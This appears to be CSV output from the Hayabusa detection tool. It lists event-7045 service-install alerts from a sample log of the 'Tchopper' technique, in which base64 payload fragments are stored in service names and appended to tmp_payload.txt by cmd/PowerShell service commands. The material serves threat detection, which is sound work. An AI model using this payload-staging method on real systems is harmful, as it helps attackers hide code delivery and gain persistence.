T2JqZWN0IFN5c3RlbS5XaW5kb3dzLkZvcm1zLk9wZW5GaWxlRGlhbG9nDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuaW5pdGlhbERpcmVjdG9yeSA9ICRSb290Rm9sZGVyDQogICAgICAgICAkT3 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg169"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:20.628 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: BlbkZpbGVEaWFsb2cuVGl0bGUgPSAiU2VsZWN0IENvbXB1dGVyIExpc3QiDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsdGVyID0gIkFsbCBmaWxlcyAoKi4qKXwgKi4qIg0KICAgICAgICAg | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg170"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:22.226 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: 
JE9wZW5GaWxlRGlhbG9nLlNob3dEaWFsb2coKSB8IE91dC1OdWxsDQogICAgICAgICAkT3BlbkZpbGVEaWFsb2cuZmlsZW5hbWUNCiAgICANCiAgICB9DQogICAgDQogICAgY2F0Y2ggew0KICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg171"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:23.680 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:23.680 
+09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ANCiAgICAgICAgV3JpdGUtTG9nICRFUlJPUl9MT0cgIlVuYWJsZSB0byBTZWxlY3QgRmlsZSINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAkRXJyb3JbMF0NCg0KICAgICAgICAkRXJy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg172"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:19:25.137 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: b3JMaW5lTnVtYmVyID0gJEVycm9yWzBdLkludm9jYXRpb25JbmZvLnNjcmlwdGxpbmVudW1iZXINCg0KICAgICAgICBXcml0ZS1Mb2cgJEVSUk9SX0xPRyAiQ2F1Z2h0IG9uIGxpbmUgbnVtYmVyOi | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg173"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:26.591 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AkRXJyb3JMaW5lTnVtYmVyIg0KDQogICAgICAgIGV4aXQNCiAgICAgICAgDQogICAgIH0NCn0gICAgICAgICAgDQogICAgICAgIA0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMj | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg174"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:28.028 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: IyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjDQojRnVuY3Rpb24gd2lsbCBnZW5lcmF0ZSBhIEZvbGRlciBTZWxlY3QgRGlhbG9nDQ | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg175"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command 
""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:29.482 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: oNCiNAcGFyYW0gJERlc2NyaXB0aW9uIC0+ICBUaGUgRGVzY3JpcHRpb24gb2YgdGhlIERpYWxvZw0KI0BwYXJhbSAkUm9vdEZvbGRlciAgLT4gIFRoZSBsb2NhdGlvbiB0aGF0IHRoZSBmb2xkZXIg | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg176"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: 
c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:30.940 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: c2VsZWN0aW9uIGJlZ2lucw0KDQojIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIyMjIy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg177"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:32.394 
+09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:32.394 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: MjIyMjDQoNCmZ1bmN0aW9uIFNlbGVjdC1FeHBvcnRMb2NhdGlvbiB7IHBhcmFtKCREZXNjcmlwdGlvbiwgJFJvb3RGb2xkZXIpIA0KDQogICAgIHRyeSB7DQogICAgIA0KICAgICAgICAkb2JqRm9y | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg178"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload 
deployed via service - Tchopper.evtx" +2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:33.831 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: bSA9IE5ldy1PYmplY3QgU3lzdGVtLldpbmRvd3MuRm9ybXMuRm9sZGVyQnJvd3NlckRpYWxvZw0KICAgICAgICAkb2JqRm9ybS5Sb290Zm9sZGVyID0gJFJvb3RGb2xkZXINCiAgICAgICAgJG9iak | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg179"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand 
start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:35.440 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: Zvcm0uRGVzY3JpcHRpb24gPSAkRGVzY3JpcHRpb24gICAgICAgIA0KICAgICAgICAkU2hvdyA9ICRvYmpGb3JtLlNob3dEaWFsb2coKQ0KDQogICAgICAgIGlmICgkU2hvdyAtRVEgIk9LIikgew0K | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg180"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,info,,New Service Installed,"Name: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append 
tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_SuspiciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 17:19:36.895 +09:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ICAgICAgICAgICAgDQogICAgICAgICAgICByZXR1cm4gJG9iakZvcm0uU2VsZWN0ZWRQYXRoDQogICAgICAgIH0NCiAgICAgICAgDQogICAgICAgIGVsc2UgeyAgICAgICAgICAgDQogICAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg181"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_CreateOrModiftySystemProcess-WindowsService_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed 